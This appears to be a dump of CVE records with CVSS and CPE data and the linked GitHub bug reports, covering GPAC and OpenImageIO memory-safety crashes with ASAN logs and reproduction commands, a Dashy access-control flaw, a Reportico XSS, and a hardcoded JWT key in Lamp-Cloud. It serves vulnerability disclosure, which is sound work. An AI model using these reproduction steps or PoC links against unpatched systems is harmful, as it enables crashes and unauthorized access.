[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2657
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# heap-buffer-overflow in gf_isom_use_compact_size gpac/src/isomedia/isom_write.c:3403:3 in gpac/gpac ### Description Heap-buffer-overflow in MP4Box. ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_VORBIS GPAC_HAS_LINUX_DVB ``` ### ASAN Log ./MP4Box -add self:moovts=-1:noedit:stz2:profile=high:level=7 poc1gpac ```shell ================================================================= ==3459603==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006b71 at pc 0x0000004a2c4f bp 0x7ffffffec1a0 sp 0x7ffffffeb968 WRITE of size 4 at 0x602000006b71 thread T0 #0 0x4a2c4e in __asan_memset (/afltest/gpac/bin/gcc/MP4Box+0x4a2c4e) #1 0x7ffff665aacc in gf_isom_use_compact_size /afltest/gpac/src/isomedia/isom_write.c:3403:3 #2 0x54e099 in import_file /afltest/gpac/applications/mp4box/fileimport.c:1707:8 #3 0x4f7d1e in do_add_cat /afltest/gpac/applications/mp4box/mp4box.c #4 0x4f7d1e in mp4box_main /afltest/gpac/applications/mp4box/mp4box.c:6196:13 #5 0x7ffff58cc082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x42adad in _start (/afltest/gpac/bin/gcc/MP4Box+0x42adad) 0x602000006b71 is located 0 bytes to the right of 1-byte region [0x602000006b70,0x602000006b71) allocated by thread T0 here: #0 0x4a34ed in malloc (/afltest/gpac/bin/gcc/MP4Box+0x4a34ed) #1 0x7ffff665aa7d in gf_isom_use_compact_size /afltest/gpac/src/isomedia/isom_write.c:3401:24 SUMMARY: AddressSanitizer: heap-buffer-overflow (/afltest/gpac/bin/gcc/MP4Box+0x4a2c4e) in __asan_memset Shadow bytes around the buggy address: 0x0c047fff8d10: fa fa 00 04 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8d20: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa 00 05 0x0c047fff8d30: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8d40: fa fa 00 00 fa fa 00 00 fa fa 04 fa fa fa 00 00 0x0c047fff8d50: fa fa 00 00 fa fa fd fd fa fa fd fa fa fa fd fd =>0x0c047fff8d60: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa[01]fa 0x0c047fff8d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3459603==ABORTING ``` ### Reproduction ```shell git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j24 ./bin/gcc/MP4Box -add self:moovts=-1:noedit:stz2:profile=high:level=7 poc1gpac ``` ### PoC poc1gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1gpac ### **Impact** This vulnerability is capable of causing crashes. ### Reference https://github.com/gpac/gpac ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
heap-buffer-overflow in gf_isom_use_compact_size gpac/src/isomedia/isom_write.c:3403:3 in gpac/gpac
https://api.github.com/repos/gpac/gpac/issues/2657/comments
0
2023-10-22T20:14:14Z
2023-10-23T13:23:29Z
https://github.com/gpac/gpac/issues/2657
1,956,040,458
2,657
5,718
CVE-2023-46928
2023-11-01T15:15:08.753
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/0753bf6d867343a80a044bf47a27d0b7accc8bf1" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2661" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/0753bf6d867343a80a044bf47a27d0b7accc8bf1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2661" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2661
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# SEGV in MP4Box ### Description SEGV in gpac/MP4Box. #0 0x7ffff6798224 in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42 ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_VORBIS GPAC_HAS_LINUX_DVB ``` ### ASAN Log ./MP4Box -add self:svcmode=splitbase:negctts:compat=15 poc3gpac ```shell AddressSanitizer:DEADLYSIGNAL ================================================================= ==3037861==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000002 (pc 0x7ffff6798224 bp 0x00000000000f sp 0x7ffffffec1c0 T0) ==3037861==The signal is caused by a WRITE memory access. ==3037861==Hint: address points to the zero page. #0 0x7ffff6798224 in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42 #1 0x54edae in import_file /afltest/gpac/applications/mp4box/fileimport.c:1767:8 #2 0x4f7d1e in do_add_cat /afltest/gpac/applications/mp4box/mp4box.c #3 0x4f7d1e in mp4box_main /afltest/gpac/applications/mp4box/mp4box.c:6196:13 #4 0x7ffff58cc082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x42adad in _start (/afltest/gpac/bin/gcc/MP4Box+0x42adad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /afltest/gpac/src/media_tools/isom_tools.c:3293:42 in gf_media_change_pl ==3037861==ABORTING ``` ### Reproduction ```shell git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j24 ./bin/gcc/MP4Box -add self:svcmode=splitbase:negctts:compat=15 poc3gpac ``` ### PoC poc3gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc3gpac ### **Impact** This vulnerability is capable of causing crashes. ### Reference https://github.com/gpac/gpac ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
SEGV in gpac/MP4Box in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42
https://api.github.com/repos/gpac/gpac/issues/2661/comments
0
2023-10-24T08:08:44Z
2023-10-26T10:37:05Z
https://github.com/gpac/gpac/issues/2661
1,958,731,162
2,661
5,719
CVE-2023-5916
2023-11-02T11:15:14.540
A vulnerability classified as critical has been found in Lissy93 Dashy 2.1.1. This affects an unknown part of the file /config-manager/save of the component Configuration Handler. The manipulation of the argument config leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-244305 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Lissy93/dashy/issues/1336" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://treasure-blarney-085.notion.site/Dashy-0dca8a0ebbd84f78ae6d03528ff1538c?pvs=4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.244305" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.244305" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Lissy93/dashy/issues/1336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://treasure-blarney-085.notion.site/Dashy-0dca8a0ebbd84f78ae6d03528ff1538c?pvs=4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.244305" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.244305" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dashy:dashy:2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "43ECA239-B554-4FF1-BDA4-CF648B2387CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "284" ]
284
https://github.com/Lissy93/dashy/issues/1336
[ "Exploit", "Issue Tracking" ]
github.com
[ "Lissy93", "dashy" ]
### Environment Self-Hosted (Docker) ### System _No response_ ### Version 2.1.1 ### Describe the problem the "disableConfiguration" has set to "true" but the configuration is able to change via http request ![651946e662acb](https://github.com/Lissy93/dashy/assets/59787869/6738e7b3-a5c2-4941-88c0-9cee3181d794) ![651947d58115f](https://github.com/Lissy93/dashy/assets/59787869/3432f4bf-b2a9-4e22-808f-986499f1368e) ![651947ef15e34](https://github.com/Lissy93/dashy/assets/59787869/25659d2a-141c-4714-8763-8f976ef50ae1) ### Additional info _No response_ ### Please tick the boxes - [X] You have explained the issue clearly, and included all relevant info - [X] You are using a [supported](https://github.com/Lissy93/dashy/blob/master/.github/SECURITY.md#supported-versions) version of Dashy - [X] You've checked that this [issue hasn't already been raised](https://github.com/Lissy93/dashy/issues?q=is%3Aissue) - [X] You've checked the [docs](https://github.com/Lissy93/dashy/tree/master/docs#readme) and [troubleshooting](https://github.com/Lissy93/dashy/blob/master/docs/troubleshooting.md#troubleshooting) guide ![important](https://img.shields.io/badge/Important!-F6094E) - [X] You agree to the [code of conduct](https://github.com/Lissy93/dashy/blob/master/.github/CODE_OF_CONDUCT.md#contributor-covenant-code-of-conduct)
[BUG] Unauthorized access
https://api.github.com/repos/Lissy93/dashy/issues/1336/comments
2
2023-10-01T10:53:58Z
2024-02-04T11:48:14Z
https://github.com/Lissy93/dashy/issues/1336
1,920,701,292
1,336
5,720
CVE-2023-46925
2023-11-02T17:15:11.567
Reportico 7.1.21 is vulnerable to Cross Site Scripting (XSS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/reportico-web/reportico/issues/47" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/reportico-web/reportico/issues/47" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:reportico:reportico:7.1.21:*:*:*:*:*:*:*", "matchCriteriaId": "36090B19-CD3B-42FD-BDB2-C30FA144EDD0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/reportico-web/reportico/issues/47
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "reportico-web", "reportico" ]
Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code, (typically HTML or JavaScript), into the contents of an outside website. When a victim views an infected page on the website, the injected code executes in the victim’s browser. Consequently, the attacker has bypassed the browser’s same origin policy and is able to steal private information from a victim associated with the website. Steps: 1. Login into the Reportico-7.1 admin module 2. Under create report in project, enter the XSS payload in title section. 3. The payload will execute once it's saved. ![1](https://user-images.githubusercontent.com/33874453/168795948-75eb00e9-eeb8-42c7-b666-9de73355594b.png) ![2](https://user-images.githubusercontent.com/33874453/168795953-e37f6bca-098f-4ec1-a722-9dcfe9b6e27d.png) ![3](https://user-images.githubusercontent.com/33874453/168795962-685d94a7-03a6-42b9-804f-71e2a15e1981.png) ![4](https://user-images.githubusercontent.com/33874453/168795965-1b751c7f-0e50-4403-bfcc-90ec2744c8ee.png)
Reflected XSS in Reportico-7.1
https://api.github.com/repos/reportico-web/reportico/issues/47/comments
4
2022-05-17T10:58:47Z
2023-07-06T12:17:22Z
https://github.com/reportico-web/reportico/issues/47
1,238,463,044
47
5,721
CVE-2023-31579
2023-11-02T22:15:08.640
Dromara Lamp-Cloud before v3.8.1 was discovered to use a hardcoded cryptographic key when creating and verifying a Json Web Token. This vulnerability allows attackers to authenticate to the application via a crafted JWT token.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/dromara/lamp-cloud/issues/183" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xubowenW/JWTissues/blob/main/lamp%20issue.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/dromara/lamp-cloud/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xubowenW/JWTissues/blob/main/lamp%20issue.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tangyh:lamp-cloud:*:*:*:*:*:*:*:*", "matchCriteriaId": "D2219072-7E2E-4806-9D8B-32064FA47067", "versionEndExcluding": "3.8.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/dromara/lamp-cloud/issues/183
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "dromara", "lamp-cloud" ]
# 版本信息: JDK 版本(必填) : -- 源码版本(必填):3.7.0 MySQL(必填):-- Nacos(必填):-- # 问题描述: Hi, we are a research group to help developers build secure applications. We designed a cryptographic misuse detector on Java language. We found your great public repository (i.e., lamp-cloud) from Github, and several security issues detected by our detector are shown in the following. The specific security issues we found are as follows: (1) Location: lamp-core-3.7.0 Package: top.tangyh.basic.context Class: ContextConstant.class Security issue: Using predictable/constant cryptographic key when creating and verifing Json Web Token. (2) Location: lamp-util-3.7.0 Package: top.tangyh.basic.jwt.utils Class: JwtUtil.class Security issue: Using predictable/constant cryptographic key when creating and verifing Json Web Token. # 报错截图 ![image](https://user-images.githubusercontent.com/40926753/188397016-3b944eb0-edd6-48fc-975e-728bc608c9d3.png) ![image](https://user-images.githubusercontent.com/40926753/188397098-c64f7e04-d5dc-4af8-aa41-249090fbb8a3.png) # 重现步骤 1. 访问了什么接口? 2. 传递什么参数? 3. 后端控制台报了什么错? 4. 前端控制台报了什么错? # 支持一下 如果该issue帮助了你, 麻烦给项目点个star, 并给当前issue回复一下 “👍” 或者 “已解决”.
Using predictable/constant cryptographic key when creating and verifing Json Web Token.
https://api.github.com/repos/dromara/lamp-cloud/issues/183/comments
4
2022-09-05T07:52:22Z
2023-08-24T01:41:03Z
https://github.com/dromara/lamp-cloud/issues/183
1,361,544,458
183
5,722
CVE-2023-42299
2023-11-02T22:15:09.113
Buffer Overflow vulnerability in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_subimage_data function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/OpenImageIO/oiio/issues/3840" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/OpenImageIO/oiio/issues/3840" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openimageio:openimageio:2.4.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "28795C4C-8800-499D-8C41-5B27C2745310", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/OpenImageIO/oiio/issues/3840
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "OpenImageIO", "oiio" ]
Describe the bug: Hi, I found heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368. To Reproduce: Steps to reproduce the behavior: 1. CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE_CXX_STANDARD=17 2. make && make install 3. iconvert poc /tmp/res poc file: [poc.zip](https://github.com/OpenImageIO/oiio/files/11477492/poc.zip) Evidence: ==1483==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a3f9 at pc 0x7f8fd7a5f640 bp 0x7ffd22f8daf0 sp 0x7ffd22f8dae8 READ of size 1 at 0x60200000a3f9 thread T0 #0 0x7f8fd7a5f63f in OpenImageIO_v2_4::GIFInput::read_subimage_data() /root/github/oiio-2.4.11.0_1/src/gif.imageio/gifinput.cpp:368:65 #1 0x7f8fd7a57713 in OpenImageIO_v2_4::GIFInput::seek_subimage(int, int) /root/github/oiio-2.4.11.0_1/src/gif.imageio/gifinput.cpp:449:10 #2 0x7f8fd7a559af in OpenImageIO_v2_4::GIFInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_4::ImageSpec&) /root/github/oiio-2.4.11.0_1/src/gif.imageio/gifinput.cpp:165:9 #3 0x7f8fd75febcf in OpenImageIO_v2_4::ImageInput::create(OpenImageIO_v2_4::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v2_4::ImageSpec const*, OpenImageIO_v2_4::Filesystem::IOProxy*, OpenImageIO_v2_4::basic_string_view<char, std::char_traits<char> >) /root/github/oiio-2.4.11.0_1/src/libOpenImageIO/imageioplugin.cpp:786:27 #4 0x7f8fd7552674 in OpenImageIO_v2_4::ImageInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v2_4::ImageSpec const*, OpenImageIO_v2_4::Filesystem::IOProxy*) /root/github/oiio-2.4.11.0_1/src/libOpenImageIO/imageinput.cpp:112:16 #5 0x564781f3b48f in convert_file(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /root/github/oiio-2.4.11.0_1/src/iconvert/iconvert.cpp:330:15 #6 0x564781f4006f in main /root/github/oiio-2.4.11.0_1/src/iconvert/iconvert.cpp:523:14 #7 0x7f8fd493fd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d) #8 0x7f8fd493fe3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d) #9 0x564781e7ac74 in _start (/root/github/oiio-2.4.11.0_1/dist/bin/iconvert+0x40c74) (BuildId: ac1803a32a6497261464974329db9ccd18ce83ad) 0x60200000a3f9 is located 3 bytes to the right of 6-byte region [0x60200000a3f0,0x60200000a3f6) allocated by thread T0 here: #0 0x564781efdca8 in __interceptor_calloc (/root/github/oiio-2.4.11.0_1/dist/bin/iconvert+0xc3ca8) (BuildId: ac1803a32a6497261464974329db9ccd18ce83ad) #1 0x7f8fd22f6b98 in GifMakeMapObject (/lib/x86_64-linux-gnu/libgif.so.7+0x3b98) (BuildId: 1fff7899d615250f1b273a11e966d1347b233009) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/github/oiio-2.4.11.0_1/src/gif.imageio/gifinput.cpp:371:65 in OpenImageIO_v2_4::GIFInput::read_subimage_data() Shadow bytes around the buggy address: 0x0c047fff9420: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff9430: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff9440: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff9450: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fd 0x0c047fff9460: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd =>0x0c047fff9470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 06[fa] 0x0c047fff9480: fa fa 04 fa fa fa 01 fa fa fa fa fa fa fa fa fa 0x0c047fff9490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff94a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff94b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff94c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1483==ABORTING Platform information: OIIO branch/version: 2.4.11 OS: Linux C++ compiler: clang-14.0.6
heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368
https://api.github.com/repos/AcademySoftwareFoundation/OpenImageIO/issues/3840/comments
13
2023-05-15T11:55:43Z
2024-09-05T17:39:38Z
https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/3840
1,709,938,318
3,840
5,723
CVE-2023-46947
2023-11-03T13:15:08.797
Subrion 4.2.1 has a remote command execution vulnerability in the backend.
